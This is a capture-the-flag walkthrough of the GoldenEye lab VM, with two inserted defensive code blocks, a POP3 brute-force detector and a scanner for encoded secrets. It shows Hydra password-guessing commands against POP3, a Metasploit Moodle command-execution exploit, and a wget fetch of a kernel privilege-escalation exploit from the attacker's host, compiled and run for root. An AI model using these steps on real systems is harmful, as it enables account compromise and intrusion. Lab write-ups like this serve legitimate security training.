It took me a good two weeks to pop this box. With the help of heaps of googling, I managed to break into it. I wanted to try a more difficult CTF this time around. The author of this box wanted to create an OSCP-style box, which is perfect for my needs as well.
I recently got done creating an OSCP type vulnerable machine that’s themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes — flag.txt.
I’d rate it as Intermediate, it has a good variety of techniques needed to get root — no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there’s a hint of CTF flavor.
I started off with an nmap scan. Let's peek at the results.
There are four open ports:
25 — SMTP
80 — HTTP
55006 — POP3
55007 — POP3
Let's have a look at port 80 and see what we can find. Some additional thoughts: I have never investigated port 25 or POP3 ports before, so this will be the first CTF where I do.
I ran a scan to see if there was anything interesting. Before I start: this was a rabbit hole that didn't lead me anywhere, but I thought I would include it anyway.
From the above screenshot, we can see a couple of things that seemed interesting at the time.
I decided to browse to this website.
Nothing all too interesting. I even downloaded the picture of Boris holding the gun and ran strings on it to see if there were any hidden passwords in it. Nothing.
I point my browser to 192.168.56.101, which is the IP of the box. Let's see what we can find.
We can see a pretty cool-looking site, but nothing that helps us with anything. I thought about going to the link /sev-home/ to see if there was anything interesting there.
So it has given me a username and password field, and nothing I can see provides that information. Let's have a look at the source code: I right-click and choose View Source.
The above image is the source code for the website. I can see something interesting: terminal.js. I know this because it was the first step for the Hack The Box invite code, which I am still stuck on :(.
I can use this as a path on the site. Let's point our browser to 192.168.56.101/terminal.js
This is awesome! Now we can see a couple of different artifacts that we can use:
I assume these are for the site /sev-home/. We also have a username, Boris; I am thinking about using a brute-force attack to crack the password, which could be for the SMTP or POP service.
Let's put the password into a decoder.
Nice! The password for Boris is: InvincibleHack3r
I will use this information to enter the site.
The above screenshot doesn't actually give me anything interesting; however, I did take note of the last paragraph. It states that they have configured pop3 to run on a very high non-default port. Going back to our nmap scan, we can see the POP service running on ports 55006 and 55007.
My initial thought is to crack Boris's password with Hydra against the POP3 service.
I started cracking Boris's password against the pop3 service with a smaller word list than usual.
hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.56.101 -s 55007 pop3
Let's look at the results.
The password is secret1! Feeling really good!!
Now that we have cracked Boris' password against the pop3 service, let's see if we can log in using telnet.
From the above screenshot:
I managed to access his mailbox with the credentials and was able to list the emails currently in his inbox. He has 3 at the moment. Let's peek at them to see what they contain. I would like to take this opportunity to say that I wasted a lot of time googling the commands for a POP3 server! Who uses POP3 these days..
The first email doesn't give us much. I used the commands retr 1 / retr 2 / retr 3 to read the messages.
The 2nd email states that Natalya can break Boris's codes. Nothing else. A side note: because Natalya is emailing Boris, I might be able to crack her password as well. Let's have a look at the last email.
This email is soooo sly. Something fishy is about to happen! I really enjoy it when the author paints a story into these CTFs. It makes it so much more fun! Anyway, from what we can gather in the email, there is another user named Xenia for a training site. What is this training site they are talking about? Also, Alec states that there are access codes attached to this email, which I cannot see at all!!
I've been googling how to unhide attachments from pop3 servers, but no luck. This may be another rabbit hole that leads me nowhere, but it might also give me some clues.
Let's see if we can crack Natalya's password against the pop3 service. I typed in the same command as before, but replaced boris with natalya.
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.56.101 -s 55007 pop3
Got it!! Her password is bird
Let's log onto her mailbox and read her emails!!
I ran telnet 192.168.56.101 55007 and entered her username and password, Natalya:bird
I'm in! Let's type list to see how many messages are in the inbox.
Only 2 for Natalya. Let's read them one by one.
The first email states that Natalya should stop breaking into Boris' codes (lol), and to be cautious because there may be network breaches by a person named Janus!! This is all unfolding really nicely. It also states that Natalya is a GNO Supervisor for the training site.
I’m starting to see the picture now:
Let's move on and read the 2nd email.
Nice! So we have some information that we can work with now.
Awesome! So let's change the hostname mapping, then go to /gnocertdir/ and have a look at what's there.
I changed the hosts file so that the IP address 192.168.56.101 resolves to severnaya-station.com
The above image shows that I have successfully changed the hosts file in Linux.
After doing this, I can confirm that the name resolves as expected.
Going to the hostname instead of the IP address with the directory /gnocertdir/, we can see the GoldenEye Operators Training website!
Something to keep in mind from observing this website: it is powered by Moodle.
Let's log in as Xenia.
After scanning through the website, I see a message exchange from Dr Doak to Xenia, in which Doak introduces himself. Something interesting that I picked up was:
My immediate thought is to crack Doak's password with hydra. Let's use the same command as last time, replacing natalya with doak.
hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.56.101 -s 55007 pop3
Once again, it worked perfectly! The password for doak is goat. My thought is to have a look at his emails, so let's log in.
I used netcat 192.168.56.101 5507 to log onto his mailbox. I could have used telnet, but I wanted to try netcat to see if it works.
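The three Hydra runs above (against boris, natalya and doak) all look the same from the server side: a burst of failed POP3 logins from one source address, then a success. The following is an added example from the editor, not part of the original write-up, showing how a defender would spot that pattern in mail-server logs. The log lines are constructed Dovecot-style pop3-login entries (the box's actual POP3 daemon and log format are not shown in the post); the threshold and window values are arbitrary tuning knobs.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Dovecot-style pop3-login lines (not taken from the original post):
# six failures for one user from one source in a few seconds, then a success from
# the same source, then an unrelated single failure and a non-POP3 line.
FAIL = ("Apr 24 10:01:{:02d} severnaya dovecot: pop3-login: Disconnected (auth failed, "
        "1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.56.4, lip=192.168.56.101")
SAMPLE_LOG = [FAIL.format(s) for s in range(1, 7)] + [
    "Apr 24 10:01:09 severnaya dovecot: pop3-login: Login: user=<boris>, method=PLAIN, "
    "rip=192.168.56.4, lip=192.168.56.101, mpid=1234",
    "Apr 24 10:30:00 severnaya dovecot: pop3-login: Disconnected (auth failed, 1 attempts "
    "in 2 secs): user=<natalya>, method=PLAIN, rip=10.0.0.7, lip=192.168.56.101",
    "Apr 24 10:31:00 severnaya sshd[42]: Accepted publickey for ops from 10.0.0.7",
]

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dovecot: pop3-login: "
    r"(?P<outcome>Login:|Disconnected \(auth failed[^)]*\):) "
    r"user=<(?P<user>[^>]*)>, method=\w+, rip=(?P<rip>[\d.]+)"
)


def parse_line(line):
    """Return a dict for a pop3-login line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"),  # syslog has no year
        "ok": m["outcome"] == "Login:",
        "user": m["user"],
        "rip": m["rip"],
    }


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Flag source IPs with >= threshold failed logins inside window_s seconds.

    A success from the same source while the failure window is still full is
    reported as a likely compromised account (password guessed).
    """
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    by_rip = defaultdict(list)
    for e in events:
        by_rip[e["rip"]].append(e)

    alerts = []
    for rip, evs in by_rip.items():
        window = []          # recent failures from this source
        burst_seen = False
        users, compromised = set(), set()
        for e in evs:
            cutoff = e["ts"] - timedelta(seconds=window_s)
            window = [f for f in window if f["ts"] >= cutoff]
            if e["ok"]:
                if len(window) >= threshold:
                    compromised.add(e["user"])
                continue
            window.append(e)
            if len(window) >= threshold:
                burst_seen = True
                users.update(f["user"] for f in window)
        if burst_seen:
            alerts.append({
                "rip": rip,
                "failures": sum(not x["ok"] for x in evs),
                "users": sorted(users),
                "compromised": sorted(compromised),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

Run as a script it prints one alert for 192.168.56.4 naming boris as compromised; the lone natalya failure from 10.0.0.7 stays below the threshold. In practice the same logic sits behind a fail2ban jail or a SIEM rule, and the "success after burst" case is the one worth paging on, since it means the guessing worked.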
He only has 1 email. I had a look at it and can see a username and password. I'm killing it!!
Logged in as dr_doak with the correct credentials. Having a look around, I stumbled across his Private files.
I could see a file called s3cret.txt. Let's download it and have a look at its contents.
Looks like someone was able to capture the admin password for this training site. This also means we can use this username and password to attack the Moodle website through Metasploit. First, let's browse to the directory /dir007key/for-007.jpg
Browsing to it gives me a picture.
I right-click and save it. I then ran file for-007.jpg to see what type of file this is
From the above screenshot, I can see something interesting in the description.
I copied and pasted the contents of the description into Burp Decoder and obtained the admin password: xWinter1995x!
I fired up Metasploit and searched for moodle to see if there are any exploits I can use.
Moodle_cmd_exec looks to be the correct one to use. I typed show options to see what fields I need to fill in, and filled them in accordingly. I then typed exploit to run it.
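Both credential leaks in this box (the encoded password in terminal.js earlier, and the base64 string in the image description here) are the kind of thing a scan of your own deployed assets should catch before anyone else does. The following scanner is an added example from the editor, not code from the original post or from the GoldenEye author: it walks JPEG marker segments and searches the metadata segments (and, for non-JPEG files, the whole body) for HTML numeric-entity runs and base64 runs that decode to readable text. The sample JavaScript and JPEG bytes are constructed here, with made-up placeholder secrets; a real EXIF description lives inside a TIFF IFD in the APP1 segment, but since the scanner searches raw segment bytes it does not need to parse that structure.

```python
import base64
import binascii
import re
import struct

B64_RE = re.compile(rb"[A-Za-z0-9+/]{12,}={0,2}")       # 12+ base64 chars, optional padding
ENTITY_RE = re.compile(rb"(?:&#\d{2,3};){6,}")          # six or more numeric entities in a row


def _printable(raw: bytes, min_len: int = 8):
    """Return decoded text if it looks like a human-readable secret, else None."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if len(text) >= min_len and text.isprintable() else None


def decode_candidates(blob: bytes):
    """Find entity-encoded and base64-encoded runs in blob that decode to text."""
    hits = []
    for m in ENTITY_RE.finditer(blob):
        codes = [int(c) for c in re.findall(rb"&#(\d+);", m.group())]
        if max(codes) > 255:
            continue
        text = _printable(bytes(codes))
        if text:
            hits.append(("html-entities", text))
    for m in B64_RE.finditer(blob):
        try:
            raw = base64.b64decode(m.group(), validate=True)
        except binascii.Error:
            continue  # ordinary identifiers such as getElementById fail padding checks
        text = _printable(raw)
        if text:
            hits.append(("base64", text))
    return hits


def jpeg_segments(data: bytes):
    """Yield (marker, payload) for each marker segment before the image scan data."""
    pos = 2  # skip SOI (FF D8)
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == 0xDA:  # SOS: entropy-coded image data follows, nothing more to read
            break
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def scan_asset(name: str, data: bytes):
    """Scan a web asset; JPEGs are limited to APPn (EXIF/XMP) and COM segments."""
    if data[:2] == b"\xff\xd8":
        hits = []
        for marker, payload in jpeg_segments(data):
            if 0xE0 <= marker <= 0xEF or marker == 0xFE:
                hits.extend(decode_candidates(payload))
        return hits
    return decode_candidates(data)


# --- constructed samples (placeholder secrets, not the box's real values) ---
def _segment(marker: int, payload: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

SECRET_IN_JPEG = "Example-Pass-1!"
SECRET_IN_JS = "Example-Pass-2!"
SAMPLE_JPG = (b"\xff\xd8"
              + _segment(0xE1, b"Exif\x00\x00" + base64.b64encode(SECRET_IN_JPEG.encode()))
              + _segment(0xFE, b"constructed comment")
              + b"\xff\xda\x00\x02\xff\xd9")
SAMPLE_JS = ("// constructed terminal.js look-alike\n"
             "var user = 'boris';\n"
             "var pw = '" + "".join(f"&#{ord(c)};" for c in SECRET_IN_JS) + "';\n"
             "var term = document.getElementById('term');\n").encode()

if __name__ == "__main__":
    for name, data in (("terminal.js", SAMPLE_JS), ("for-007.jpg", SAMPLE_JPG)):
        print(name, scan_asset(name, data))
```

Pointed at a real web root the scanner would be run over every .js and image file; findings decoding to something password-shaped go straight to a rotate-and-remove ticket, since obfuscation in a client-side file is not a control.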
From the above screenshot, I was able to obtain shell access!!
I typed id / whoami to see what permissions I currently have. I also typed which gcc to see if a compiler is installed on this server. It is not, but cc is, so I need to adjust the exploit manually to be able to run it.
I typed uname -a to see which kernel version this server is running. A quick google found that I can exploit this version with a privilege-escalation exploit.
I downloaded the exploit and changed a setting within it so that it could compile and run properly on the victim machine. I opened my trusty text editor and changed gcc to cc.
Sweet, that looks good to go now. Next step: transfer the file from my Kali machine to the victim machine.
I set up a SimpleHTTPServer on port 6969 on my Kali box, then ran wget http://192.168.56.4:6969/37292.c on the victim. It downloaded successfully.
I compiled the exploit with cc 37292.c -o evil, then set the permissions to 700 on the exploit called evil.
I ran the newly compiled exploit and obtained root on this box!! We can confirm this by typing id.
Finally, I change directory into the root folder and cat the flag!! It's telling me to go to another directory on the webserver.
I pointed my browser to the new location and slayed the final flag!